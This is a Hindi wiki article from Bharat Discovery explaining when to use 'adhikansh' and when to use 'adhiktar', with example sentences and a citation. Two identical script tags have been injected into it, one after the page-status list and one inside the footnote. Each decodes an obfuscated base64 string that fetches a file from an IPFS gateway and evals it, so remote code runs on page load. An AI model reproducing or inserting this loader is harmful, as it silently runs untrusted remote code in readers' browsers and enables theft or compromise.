अधिकांश और अधिकतर

भारत डिस्कवरी प्रस्तुति
गोविन्द राम (चर्चा | योगदान) द्वारा परिवर्तित 10:16, 30 जनवरी 2018 का अवतरण (→‎संबंधित लेख)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

अधिकांश और अधिकतर दोनों शब्द एक जैसे लगते है पर दोनों शब्दों के अर्थ में काफ़ी अंतर है। ‘अधिक’ और ‘अंश से बना ‘अधिकांश’ ऐसे शब्दों के साथ नहीं प्रयुक्त होना चाहिए, जिन से व्यक्त इकाइयाँ एक-एक कर के गिनी जा सकती हों। उदाहरण के लिए ‘अधिकांश विधायक’ और ‘अधिकांश ट्रेनें’ में ‘अधिकांश’ का प्रयोग ग़लत है। सही उदाहरण होंगे-‘अधिकतर विधायक’ और ‘अधिकतर ट्रेनें’। यद्यपि एक ही ट्रेन के बारे में कहा जा सकता है कि ‘अधिकाशं ट्रेन भरी है’ या ‘ट्रेन का अधिकांश भरा है।’

'अधिकांश' के उदाहरण

‘अधिकांश’ के अन्य सही प्रयोग देखिए-अधिकांश गेहूँ, अधिकांश गाना, अधिकांश माल, अधिकांश भीड़, अधिकांश कपड़ा, अधिकांश खेत इत्यादि। किसी एक कपड़े या खेत का ‘कम या अधिक अंश’ हो सकता है, पर कई कपड़ों और खेतों में से ‘अधिक’ की बात करने पर वे ‘अधिकांश’ नहीं, ‘अधिकतर’ होंगे, उदाहरणार्थ ‘अधिकतर कपड़े’ और ‘अधिकतर खेत’। ‘अधिकांश पेड़’ का मतलब है ‘पेड़ों’ (की संख्या) में से तुलनात्मक रुप से अधिक’। ‘अधिकांश’ एकवचन रहता है (इकाई का हिस्सा व्यक्त करने के लिए) तथा उस से गिनी न जा सकने वाली’ सीमा और मात्रा व्यक्त होती है, जैसे ‘अधिकांश मैदान या अधिकांश फ़्रिज ख़ाली था’ में, जब कि ‘अधिकतर’ प्रायः ‘गिना जा सकने वाला’ बहुवचन रहता है, जैसे ‘अधिकतर आदमी’। (‘अधिकांश आदमी’ नहीं, जब तक कि आदमी-विशेष के अपेक्षाकृत बड़े टुकड़े या अंश की बात न हो !)

'अधिकतर' के उदाहरण

‘अधिकतर संदूक भर गया’ ग़लत है, ‘अधिकांश संदूक भर गया’ सही है। उधर ‘अधिकतर संदूक भर गए’ सही है, और ‘अधिकांश संदूक भर गए’ ग़लत है। अलबत्ता ‘अधिकतर संदूकों का अधिकांश भर गया’ भी सही है। ‘अधिकतर फ़िल्म बेकार थी’, ग़लत है, ‘अधिकांश फ़िल्म बेकार थी’ सही है। ‘अधिकतर भीड़ चली गई’ ग़लत है, ‘अधिकतर लोग चले गए’ सही है। इस के विपरीत ‘अधिकांश भीड़ चली गई’ सही है, ‘अधिकांश लोग चले गए’ ग़लत है। ‘उस की बात का अधिकांश (संज्ञा) बकवास है’ या ‘उस की अधिकांश (विशेषण) बात बकवास है’ सही है।‘ उस की अधिकांश बातें बकवास है’ भी ग़लत हैं भी सही है। ‘उस की अधिकतर बात बकवास है’ ग़लत है और ‘उसकी अधिकांश बातें बकवास हैं’ भी ग़लत है।

यदि ‘अंश’ या ‘भाग’ के साथ ‘अधिकांश’ और ‘अधिकतर’ में से एक को लगाने की मजबूरी आ पड़ा तो ‘अधिकतर’ लगाया जाएगा, अर्थात् ‘अधिकतर अंश’ और ‘अधिकतर भाग’ सही है, ‘अधिकांश भाग’ ग़लत, वरना यह ‘अधिकांश अंश’ के बराबर हो जाएगा।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. मानक हिन्दी के शुद्ध प्रयोग भाग 1 (हिंदी) भारतीय साहित्य संग्रह। अभिगमन तिथि: 31 दिसम्बर, 2013।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख